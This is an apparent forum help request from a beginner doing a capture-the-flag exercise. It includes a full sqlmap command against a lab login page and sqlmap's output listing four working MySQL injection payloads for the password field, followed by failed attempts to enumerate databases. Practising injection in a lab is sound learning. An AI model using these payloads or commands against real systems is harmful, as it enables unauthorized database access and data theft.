I am currently working on a CTF. I managed to log into the app using manual SQLi in the password field. I then asked SQLMap to find more info, to no avail. Here is the command I use
sqlmap -u http://10.150.150.146/reviewer/login/ --method=POST --data "username=admin&password=pass&btn-Login=Log+In" --dbs --no-cast --level 5 --risk 3 --cookie PHPSESSID=0e0933c639dba6d54e816cdfbb19feec
[09:01:59] [INFO] resuming back-end DBMS 'mysql'
[09:01:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username=admin&password=pass' OR NOT 4192=4192#&btn-login=Log In
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin&password=pass' AND (SELECT 6862 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(6862=6862,1))),0x716a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MvXZ&btn-login=Log In
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: username=admin&password=pass';SELECT SLEEP(5)#&btn-login=Log In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin&password=pass' AND (SELECT 5913 FROM (SELECT(SLEEP(5)))doyo)-- mrUr&btn-login=Log In
---
[09:01:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.46, PHP 7.4.14
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:01:59] [INFO] fetching database names
[09:01:59] [WARNING] the SQL query provided does not return any output
[09:01:59] [INFO] fetching number of databases
[09:01:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:01:59] [INFO] retrieved:
[09:01:59] [WARNING] time-based comparison requires larger statistical model, please wait......................... (done)
[09:02:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[09:02:01] [ERROR] unable to retrieve the number of databases
[09:02:01] [INFO] falling back to current database
[09:02:01] [INFO] fetching current database
[09:02:01] [INFO] resumed: ''
[09:02:01] [CRITICAL] unable to retrieve the database names
[09:02:01] [INFO] fetched data logged to text files under '/home/hidden/.local/share/sqlmap/output/10.150.150.146'
I am pretty new to this and don't have a clue as to why I can't even get the DB name, any help would be much appreciated
